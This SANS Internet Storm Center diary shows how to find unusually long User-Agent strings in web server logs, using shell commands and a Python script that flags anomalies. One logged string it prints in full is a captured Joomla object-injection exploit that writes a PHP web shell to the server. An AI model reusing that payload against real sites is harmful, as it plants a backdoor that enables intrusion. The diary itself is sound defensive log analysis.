from SANS Internet Storm Center, InfoCON: green
When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest ones that I can find in my logs. First of all: how?
First, I am extracting the User Agent string from my web server access log:
cut -f 6 -d'"' access_log > /tmp/useragents (this may look different for you if you use a different log format)
Next, sorting the result by line length:
sort -u /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- (deduplicating first, since uniq alone only drops adjacent duplicates and the stable numeric sort does not group identical lines)
So finally, some of the "winners":
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) OWASMIME/4.0500 is repeated many times. No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22; O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22; a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22; O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22; s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22. chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='') {\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']); @eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22); JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22; s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22; O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9
An exploit for an OLD Joomla issue if I remember right? This stuff still works?
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)
Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...
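The same hunt in a small script, as an added example that is not part of the original diary: it parses combined-format lines, ranks the unique User-Agents by length like the pipeline above, and flags the two oddities seen here (tokens repeated many times, and a PHP serialized object in the UA). The log lines are constructed, and the length threshold and ';'-token heuristic are my own assumptions.

```python
import re
from collections import Counter

# Combined log format: the User-Agent is the second quoted field after status and size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
# A PHP serialized object header (O:<len>:"<class>":<n>:{) as it appears in Apache logs,
# where embedded quotes are escaped as \x22.
PHP_SERIAL_RE = re.compile(r'O:\d+:(?:"|\\x22)\w+(?:"|\\x22):\d+:\{')

# Constructed sample lines, not real traffic. Raw strings keep the \x22 escapes literal.
SAMPLE_LOG = [
    r'10.0.0.1 - - [01/Dec/2015:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"',
    r'10.0.0.2 - - [01/Dec/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Microsoft Outlook 15.0; Microsoft Outlook 15.0; Microsoft Outlook 15.0; ms-office)"',
    r'10.0.0.3 - - [01/Dec/2015:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "}__test|O:8:\x22stdClass\x22:0:{}"',
    'garbage line that does not parse',
]

def user_agent(line):
    """Return (client_ip, user_agent), or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return (m.group(1), m.group(2)) if m else None

def repeated_tokens(ua, min_repeats=3):
    """';'-separated tokens that occur at least min_repeats times (the Outlook case)."""
    counts = Counter(t.strip() for t in ua.split(';') if t.strip())
    return {t: n for t, n in counts.items() if n >= min_repeats}

def classify(ua, max_len=512):
    """Reasons a UA deserves a second look; an empty list means it looks ordinary."""
    reasons = []
    if len(ua) > max_len:
        reasons.append('length')
    if PHP_SERIAL_RE.search(ua):
        reasons.append('php-serialized-object')
    if repeated_tokens(ua):
        reasons.append('repeated-tokens')
    return reasons

def longest_user_agents(lines, top=5):
    """Unique UAs, longest first, as (length, ua, reasons); unparsable lines are skipped."""
    uas = {parsed[1] for parsed in map(user_agent, lines) if parsed}
    ranked = sorted(uas, key=len, reverse=True)[:top]
    return [(len(ua), ua, classify(ua)) for ua in ranked]

if __name__ == '__main__':
    for length, ua, reasons in longest_user_agents(SAMPLE_LOG):
        print(length, reasons, ua[:60])
```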
Oddly enough, no shell shock today.
What is your longest User-Agent if you search your weblogs?